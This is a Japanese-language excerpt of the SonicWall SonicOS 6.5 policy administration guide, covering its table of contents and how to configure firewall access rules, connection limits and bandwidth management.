sonicwall™ sonicos 6.5 ポリシー...sonicwall sonicos 6.5 ポリシー管理アクセス...

SonicWall™ SonicOS 6.5 ポリシー

管理

1目次

第 1 部ポリシー | ルール

アクセスルールの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6

ルール > アクセスルール . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6アクセスルールについて . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7アクセスルールの表示 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12ルールの優先順位の変更 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15アクセスルールの追加 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16アクセスルールの編集 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26個別アクセスルールの削除 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27個別アクセスルールの有効化と無効化 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27アクセスルールの既定の設定の復元 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27アクセスルールのトラフィック統計の表示 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28アクセスルールの設定例 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28

アプリケーションルールポリシーの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31

アプリケーションルールについて . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32アプリケーションルールとは？ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32アプリケーションルールのメリット . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34アプリケーション制御の仕組み . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35アプリケーションルールポリシーの作成について . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36アプリケーションルールとアプリケーション制御のライセンス . . . . . . . . . . . . . . . . . . . . 39用語 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41

ルール > アプリケーションルール . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42アプリケーションルールポリシーの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42アプリケーションルールウィザードを使用する . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45

アプリケーションルール設定の確認 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45便利なツール . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46

アプリケーションルールの使用例 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51一致オブジェクトでの正規表現の作成 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52ポリシーベースのアプリケーションルール . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53アプリケーションシグネチャベースポリシーのログ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54コンプライアンスの施行 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 55サーバの保護 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 55ホストされる電子メール環境 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 55電子メール制御 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56ウェブブラウザ制御 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57HTTP POST 制御 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58禁止するファイルタイプ制御 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 60ActiveX コントロール . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62FTP 制御 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 64

SonicWall SonicOS 6.5 ポリシー管理

目次2

帯域幅管理 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70DPI を迂回する . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70個別のシグネチャ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72リバースシェル悪用の防御 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 75

アプリケーション制御の設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80

「ルールアプリケーション制御」 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80アプリケーション制御ポリシーの作成について . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 82アプリケーション制御の状況の表示 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83アプリケーション制御のグローバル設定について . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83シグネチャの表示 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84アプリケーション制御のグローバル設定の構成 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 90アプリケーション制御の種別ごとの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 95 アプリケーション制御のアプリケーションごとの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97シグネチャによるアプリケーション制御の設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 99

NAT ポリシーの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102

ルール > NAT ポリシー . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102SonicOS での NAT について . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 103NAT 負荷分散について . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104NAT64 について . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 106NAT ポリシーエントリの表示 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 107「 NAT または NAT64 の追加または編集」ポリシー . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 108

NAT ポリシーの削除 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 113NAT ポリシーの作成例 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 114

第 2 部ポリシー | オブジェクト

一致オブジェクトの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 150

オブジェクト > 一致オブジェクト . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 150一致オブジェクトについて . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 150アプリケーションリストオブジェクトについて . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 161一致オブジェクトの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 164アプリケーションリストオブジェクトの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 165

動作オブジェクトの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 168

オブジェクト > 動作オブジェクト . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 168動作オブジェクトについて . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 169帯域幅管理を用いた動作について . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 173動作オブジェクトの作成 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 178動作オブジェクトの変更 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179パケット監視を使用したアクションの関連タスク . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 179

アドレスオブジェクトの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 182

オブジェクト > アドレスオブジェクト . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 182アドレスオブジェクトの種別 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 183


目次3

アドレスグループについて . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 184「オブジェクトについて > アドレスオブジェクト」ページ . . . . . . . . . . . . . . . . . . . . . . . . 184

既定のアドレスオブジェクトおよびアドレスグループ . . . . . . . . . . . . . . . . . . . . . . . . . . . 188既定の Pref64 アドレスオブジェクト . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189アドレスオブジェクトの追加 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189アドレスオブジェクトの編集 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 191ユーザ定義アドレスオブジェクトの削除 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 191 MAC または FQDN アドレスオブジェクトの消去 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192アドレスグループの作成 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192動的アドレスオブジェクトの使用 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 194

サービスオブジェクトの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 207

オブジェクト > サービスオブジェクト . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 207既定のサービスオブジェクトおよびグループ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 208定義済み IP ユーザ定義サービスオブジェクト用のプロトコル . . . . . . . . . . . . . . . . . . . . . 209定義済みプロトコルを使用したサービスオブジェクトの追加 . . . . . . . . . . . . . . . . . . . . . . 211カスタム IP 種別サービスの追加 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 212ユーザ定義サービスオブジェクトの編集 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 216ユーザ定義サービスオブジェクトの削除 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 217ユーザ定義サービスグループの追加 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 217ユーザ定義サービスグループの編集 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 218ユーザ定義サービスグループの削除 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 218

帯域幅オブジェクトの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 219

オブジェクト > 帯域幅オブジェクト . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 219帯域幅管理について . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 219帯域幅オブジェクトの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 220

電子メールアドレスオブジェクトの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 222

オブジェクト > 電子メールアドレスオブジェクト . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 222電子メールアドレスオブジェクトについて . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 222電子メールアドレスオブジェクトの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 224

コンテンツフィルタオブジェクトの設定 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 226

オブジェクト > コンテンツフィルタオブジェクト . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 226コンテンツフィルタオブジェクトについて . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 227URI リストオブジェクトの管理 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 232CFS 動作オブジェクトの管理 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 240CFS プロファイルオブジェクトの管理 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 251コンテンツフィルタオブジェクトの適用 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 257

第 3 部サポート

SonicWall サポート . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 259

このドキュメントについて . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 260


目次4


ポリシー | ルール

第 1 部

5

ポリシー | ルール

• アクセスルールの設定

• アプリケーションルールポリシーの設定

• アプリケーション制御の設定

• NAT ポリシーの設定

1

アクセスルールの設定

• ルール > アクセスルール (6 ページ)

• アクセスルールについて (7 ページ)

• アクセスルールの表示 (12 ページ)

• ゾーン間アクセスルールの大数の指定 (14 ページ)

• ルールの優先順位の変更 (15 ページ)

• アクセスルールの追加 (16 ページ)

• アクセスルールの編集 (26 ページ)

• 個別アクセスルールの削除 (27 ページ)

• 個別アクセスルールの有効化と無効化 (27 ページ)

• アクセスルールの既定の設定の復元 (27 ページ)

• アクセスルールのトラフィック統計の表示 (28 ページ)

• アクセスルールの設定例 (28 ページ)

ルール > アクセスルールSonicOS の「ルール > アクセスルール」ページには、並べ替え可能なアクセスルール管理インター

フェースが用意されています。アクセスルールは、着信および発信アクセスポリシーの定義、ユー

ザ認証の設定、および SonicWall セキュリティ装置のリモート管理を可能にするネットワーク管理

ツールです。


アクセスルールの設定6

「ルール > アクセスルール」ページ

トピック :

• アクセスルールについて (7 ページ)

• アクセスルールの表示 (12 ページ)


• ルールの優先順位の変更 (15 ページ)

• アクセスルールの追加 (16 ページ)

• アクセスルールの編集 (26 ページ)

• 個別アクセスルールの削除 (27 ページ)

• 個別アクセスルールの有効化と無効化 (27 ページ)

• アクセスルールの既定の設定の復元 (27 ページ)

• アクセスルールのトラフィック統計の表示 (28 ページ)

• アクセスルールの設定例 (28 ページ)

アクセスルールについてこのセクションでは、 SonicOS アクセスルールのさまざまな側面、およびそれらが SonicOS の関連機

能でどのように機能するかについて説明します。

トピック :

• ステートフルパケット検査の既定のアクセスルールについて (8 ページ)

• 接続の制限について (8 ページ)

• アクセスルールによる帯域幅管理の使用 (9 ページ)



• IPv6 のアクセスルールの設定について (11 ページ)

• NAT64 のアクセスルールの設定について (11 ページ)

• DNS プロキシのアクセスルールについて (11 ページ)

ステートフルパケット検査の既定のアクセスルールについて既定では、 SonicWall ネットワークセキュリティ装置のステートフルパケット検査によって、 LAN からインターネットへの通信はすべて許可され、インターネットから LAN へのトラフィックはすべて遮

断されます。 SonicWall ネットワークセキュリティ装置で有効になっているステートフルパケット検

査の既定のアクセスルールでは、以下の動作が定義されています。

• LAN、 WLAN から WAN または DMZ へのすべてのセッションを許可します (送信先 WAN IP アドレ

スがファイアウォール自体の WAN インターフェースの場合を除く )。

• DMZ から WAN へのすべてのセッションを許可します。

• WAN から DMZ へのすべてのセッションを禁止します。

• WAN および DMZ から LAN または WLAN へのすべてのセッションを禁止します。

既定のアクセスルールを拡張または指定変更する、追加のネットワークアクセスルールを定義する

こともできます。例えば、アクセスルールを作成することによって、 LAN ゾーンからWAN プライマ

リ IP アドレスへのアクセスを許可したり、特定の種類のトラフィック (LAN から WAN への IRC など) を遮断したり、特定の種類のトラフィック (インターネット上の特定のホストから LAN 上の特定のホス

トへの Lotus Notes データベースの同期など) を許可したり、特定のプロトコル (Telnet など) の使用を

LAN 上の許可されたユーザのみに制限したりすることができます。

個別アクセスルールは、ネットワークトラフィックの送信元 IP アドレス、送信先 IP アドレス、 IP プロトコル種別を評価し、その情報を SonicWall セキュリティ装置上に作成されているアクセスルール

と比較します。ネットワークアクセスルールは優先権を持ち、 SonicWall セキュリティ装置のステー

トフルパケット検査よりも優先させることができます。例えば、 IRC トラフィックを遮断するアクセ

スルールは、このトラフィック種別を許可している、 SonicWall セキュリティ装置の既定の設定より

も優先されます。

接続の制限について接続の制限機能は、 SonicOS の SYN Cookies および侵入防御サービス (IPS) などの機能と組み合わせたと

きに、追加のセキュリティと制御の層を提供することを目的としています。接続の制限では、アクセスルールを分類基準として使用し、そのクラスのトラフィックに割り当て可能な合計接続キャッ

シュに対する大パーセンテージを宣言して、ファイアウォールを介した接続を抑制する方法を提供します。

IPS と組み合わせて使用することによって、 Sasser、 Blaster、 Nimda などの特定のクラスのマルウェア

の拡散を緩和することができます。これらのワームは、異常に速い速度でランダムなアドレスへの接続を開始することによって拡散します。例えば、 Nimda に感染した各ホストでは 1 秒間に 300～400回の接続が試行され、 Blaster の場合は 1 秒間に 850 個のパケットが送信され、 Sasser の場合は 1 秒間

に 5,120 回の試行が可能です。通常、悪意のないネットワークトラフィック、特に保護ゾーンから非

保護ゾーン (LAN から WAN) へのトラフィックではこれほど高い数値は見られません。この種の悪意

注意：ネットワークアクセスルールを定義する機能は、非常に強力なツールです。個別アクセ

スルールを使用して、ファイアウォールの保護を無効にしたり、インターネットへのアクセス

をすべて遮断したりすることができます。ネットワークアクセスルールを作成または削除する

ときには注意が必要です。



のある活動によって、特に小規模な装置では、数秒間のうちに利用可能な接続キャッシュリソース

がすべて消費されます。

接続の制限を使用すると、ワームやウイルスの拡散防止に加えて、他の種類の接続キャッシュリソースの消費に関する問題も緩和できます。例えば、セキュリティに問題のない内部ホストでピア

ツーピアソフトウェアが実行されているとき (IPS でこのようなサービスを許可するように設定して

いる場合) や、内部または外部ホストでパケットジェネレータやスキャンツールが使用されている場

合などに発生する問題を緩和できます。

さらに、接続の制限を使用して、サーバに対して許可される正当な着信接続数を制限することにより、公開されているサーバ (ウェブサーバなど) を保護することができます (つまり、スラッシュドッ

ト効果からサーバを保護できます)。これは、完全に開いていない TCP 接続またはなりすましによる

TCP 接続を検出して防止する、 SYNフラッドに対する保護とは異なります。このような接続の制限は

非保護ゾーンのトラフィックにも多く適用されますが、必要に応じて任意のゾーンのトラフィックに適用できます。

接続の制限を適用するには、特定の種類のトラフィックに割り当て可能な接続数の割合を、大許容接続数に対するパーセンテージで定義します。既定の LAN->WAN 設定では、使用可能なすべてのリソース

が LAN-> WAN (すべての送信元、宛先、すべてのサービス)トラフィックに割り当てられます。

より限定的なルールを構築して、特定の種類のトラフィック (WAN 上の任意の送信先への FTP トラ

フィックなど) で消費できる接続のパーセンテージを制限したり、あるクラスのトラフィックに 100%を割り当てて、一般的なトラフィックは低いパーセンテージ ( 小許容値は 1%) に制限して重要なト

ラフィック (重要なサーバへの HTTPS トラフィックなど) を優先したりすることができます。

アクセスルールによる帯域幅管理の使用帯域幅管理 (BWM) によって、保証帯域幅と大帯域幅をサービスに割り当ててトラフィックの優先

順位を設定できます。アクセスルールを使用すると、帯域幅管理を特定のネットワークトラフィッ

クに適用できます。帯域幅管理が有効になっているポリシーに属しているパケットは、送信される前に、対応する優先順位キューに入れられます。

帯域幅管理は、「ネットワーク > インターフェース」ページでそれぞれのインターフェースに対して

個別に設定する必要があります。

インターフェースに帯域幅管理を設定するオプションは、帯域幅管理種別として「ファイアウォール設定 > 帯域幅管理」ページで「詳細」と「グローバル」のどちらが選択されているかによって異な

ります。

インターフェイスで帯域幅管理を有効にして設定するには:

1 「ネットワーク > インターフェース」ページに移動します。

2 インターフェースの編集アイコンを選択します。「インターフェースの編集」ダイアログが表示されます。

3 「詳細」ボタンを選択します。

4 「帯域幅管理」セクションが表示されるまで画面をスクロールします。

メモ： IPS のシグネチャを接続の制限の分類基準として使用することはできません。使用できる

のは、アクセスルール (例えば、アドレスオブジェクトとサービスオブジェクト ) のみです。

メモ：これは、「ファイアウォール設定 > 帯域幅管理」ページの「帯域幅管理種別」が「な

し」以外に設定されている場合に適用されます。



5 帯域幅管理種別が「詳細」の場合、「インターフェース送信帯域幅制限を有効にする」および「インターフェース受信帯域幅制限を有効にする」チェックボックスのどちらかまたは両方をオンにします。

a 大インターフェース出力帯域幅 (Kbps) および大インターフェース入力帯域幅 (Kbps)フィールドに、大出力および入力帯域幅を入力します。

6 帯域幅管理種別が「グローバル」の場合、「インターフェース送信帯域幅制限を有効にする」および「インターフェース受信帯域幅制限を有効にする」チェックボックスのどちらかまたは両方をオンにします。

a 利用可能な送信/受信帯域幅を、「大インターフェース送信帯域幅 (kbps)」フィールドと

「大インターフェース受信帯域幅 (kbps)」フィールドにそれぞれ入力します。

7 「OK」を選択します。

アクセスルールで帯域幅管理を有効にして設定する方法については、以下を参照してください。

• 詳細帯域幅管理での帯域幅管理の設定 (22 ページ)

• グローバル帯域幅管理での帯域幅管理の設定 (24 ページ)

帯域幅管理の詳細については、を参照してください。

• 『SonicOS システムセットアップ』ドキュメントの「帯域幅管理の有効化」

• 『SonicOS セキュリティ構成』ドキュメントの「帯域幅管理の構成」

グローバル帯域幅管理のシナリオ送信メールトラフィック (SMTP など) のアクセスルールを作成する場合は、以下のパラメータで帯域

幅管理を有効にします。

• 保証帯域幅は 20 パーセント

• 大帯域幅は 40 パーセント

• 優先順位は 0 (ゼロ)

この送信 SMTP トラフィックでは、利用可能な帯域幅の 20% が保証され、大で利用可能な帯域幅の

40% を使用できます。 SMTP トラフィックのアクセスルールが帯域幅管理が有効な唯一のルールであ

る場合:

• SMTP トラフィックで設定された大の帯域幅 (上記の大値である 40%) を使用している場合、

残り 60% の帯域幅をその他すべてのトラフィックで使用することになります。

• SMTP トラフィックで設定された大の帯域幅を使い切っていない場合は、リンク帯域幅の 60% ～100% をその他すべてのトラフィックで使用することになります。

今度は、次に示す、帯域幅管理が有効な FTP のルールについて考えます。

• 60% の保証帯域幅

• 70% の大帯域幅

• 優先順位 1

このルールを先ほどの SMTP ルールと一緒に設定した場合、トラフィックの動作は次のようになり

ます。

• 常に合計帯域幅の 60% が FTP トラフィック用に確保されます (ルールの保証により )。常に合計

帯域幅の 20% が SMTP トラフィック用に確保されます (ルールの保証により )。



• SMTP が合計帯域幅の 40% を、 FTP が合計帯域幅の 60% を使用している場合、 100% の帯域幅が

より優先順位の高いトラフィックによって使用されているので、それ以外のトラフィックを送信できません。 SMTP と FTP で使用している帯域幅が大値に達していない場合は、利用可能

な帯域幅のうちの残っている割合をその他のトラフィックで使用できます。

• SMTP トラフィック量に応じて以下のようになります。

• SMTP トラフィックが減少して合計帯域幅の 10% しか使用していない場合、 FTP は大 70%の帯域幅を、その他すべてのトラフィックは残り 20% の帯域幅を使用できます。

• SMTP トラフィックが停止した場合、 FTP は 70% の帯域幅を取得し、残り 30% はその他

すべてのトラフィックによって取得されます。

• FTP トラフィックが停止した場合、 SMTP は 40% の帯域幅を取得し、残り 60% はその他すべて

のトラフィックによって取得されます。

IPv6 のアクセスルールの設定について

IPv6 アクセスルールは、 IPv4 アドレスオブジェクトの代わりに IPv6 アドレスオブジェクトを選択す

ることで、 IPv4 アクセスと同様の方法で設定できます。「ルール > アクセスルール」ページで、「IPバージョンの表示」設定を行うには、 3 つのオプションがあります( 「IPv4」、「IPv6」、または

「IPv4 と IPv6」 )。

IPv6 アクセスルールを追加する際、送信元および送信先には IPv6 アドレスオブジェクトのみ使用で

きます。

SonicOS IPv6 実装の詳細については、『SonicOS システムセットアップ』ドキュメントの「IPv6 」セク

ションを参照してください。

NAT64 のアクセスルールの設定について

NAT64 のアクセスルールは、 IPv4 または IPv6 と同様の方法で設定できます。 NAT64 の詳細について

は、 NAT64 について (106 ページ) および NAT64 ポリシーのための WAN から WAN へのアクセスルール

の作成 (146 ページ) を参照してください。 IPv6 の詳細については、『SonicOS システムセットアップ』

ドキュメントの「IPv6」セクションを参照してください。

DNS プロキシのアクセスルールについて

「ネットワーク」 > 「DNSプロキシ」ページで DNS プロキシが有効になっている場合、インター

フェースで DNS プロキシを有効にすると、以下の設定で 1 つの許可ルールが自動的に追加されます。

• 「送信元インターフェース」と「送信先インターフェース」が同じです。

• 「送信元」は「すべて」です。

• 「送信先」はインターフェース IP です。

• 「サービス」は「DNS (名前サービス) TCP」または「DNS (名前サービス) UDP」です。

• 他の自動的に追加された管理ルールと同じ属性を持っています:

• これを無効にすることはできません。

• 「送信元 IP」のみを変更でき、「すべて」ほどアグレッシブでない送信元に設定するこ

とができます。

「TCP 経由の DNS プロキシ」が有効になっていると、別の許可ルールが自動的に追加されます。



アクセスルールの表示アクセスルールの表示はいくつかの方法でカスタマイズできます。それらの方法は単独で、または

組み合わせて使用することができます。

トピック :

• IP バージョンによるルールの表示 (12 ページ)

• カスタムルールタイプまたは既定のルールタイプの表示 (12 ページ)

• ページの更新 (12 ページ)

• 表示列のカスタマイズ (13 ページ)

• 無効または未使用のルールの表示 (13 ページ)

• アクセスルール統計を消去 (13 ページ)

• ルールテーブルを既定の表示に戻す (13 ページ)

• ゾーン別にルールを表示し、マトリックスビューを使用する (14 ページ)


IP バージョンによるルールの表示

選択した IP プロトコルのルールのみを表示するには、ページ上部の「Show」オプションを使用します。

• IPv4

• IPv6

• IPv4 および IPv6 (既定)

カスタムルールタイプまたは既定のルールタイプの表示

ページの上部にある「表示」オプションを使用して、システムのデフォルトルールとカスタム定義

ルールの表示を制御します。

• 「すべてのタイプ」 (既定)

• 既定

• ユーザ定義

表の「クラス」列には、各ルールの「ユーザ定義」または「既定」が表示されます。

ページの更新

「再表示」アイコンを選択して、他の表示オプションを変更した後でページを更新します。



表示列のカスタマイズ

既定では、すべての列が表示されています。「表示オプション」アイコンを選択して、ページに

表示されている列の一部を無効にします。

列の表示を無効にするには、該当するチェックボックスをオフにします。

無効または未使用のルールの表示

「表示オプション」アイコンを選択し、次のいずれかのオプションを選択して、無効または未使用

のルールの表示を切り替えます。現在表示されている場合、オプションを選択するとそれらのルールは非表示になります。現在非表示の場合、オプションを選択するとそれらのルールが表示されます。

• 無効なルールの表示切り替え

• 未使用ルールの表示切り替え

アクセスルール統計を消去

「クリア」アイコンを選択して、ページ上のすべてのアクセスルールの統計情報を消去します。

「設定」列見出しの下にある各行のグラフアイコンにマウスを移動することで、アクセスルールの

統計情報を表示できます。

ルールテーブルを既定の表示に戻す

「復旧」アイコンを選択して、ルールテーブルの表示を既定の設定に戻します。



ゾーン別にルールを表示し、マトリックスビューを使用する

既定では、適用されるゾーンに関係なく、すべてのルールが表示されます。特定のソースゾーンと

宛先ゾーンをカバーするアクセスルールのみに表示を制限するには、ページ上部の次のオプション

のいずれかを使用します。

• 「検索」 - 値を入力して、特定のゾーン種別、優先順位、送信元/送信先、その他の条件に一致す

るすべてのゾーンを表示します。例えば、「DMZ」と入力すると、すべての DMZ に関するゾー

ンが表示され、「ファイアウォール」と入力すると、種別を問わずファイアウォールを送信元または送信先とするすべてのゾーンが表示されます。

• 「送信元/送信先」 - 「すべて」またはドロップダウンメニューを使って、目的のゾーンを選択し

ます。

• 「マトリックスビュー」アイコン - ソースと目的地の組み合わせごとに別々のテーブルと

してルールを表示するには、アイコンを選択します。

これらのオプションは、ルールと優先度タイプのサブセットを表示する方法を提供します。例えば、次のルールサブセット - VPN から WAN ページなどです。

ルールサブセット - VPN から WAN

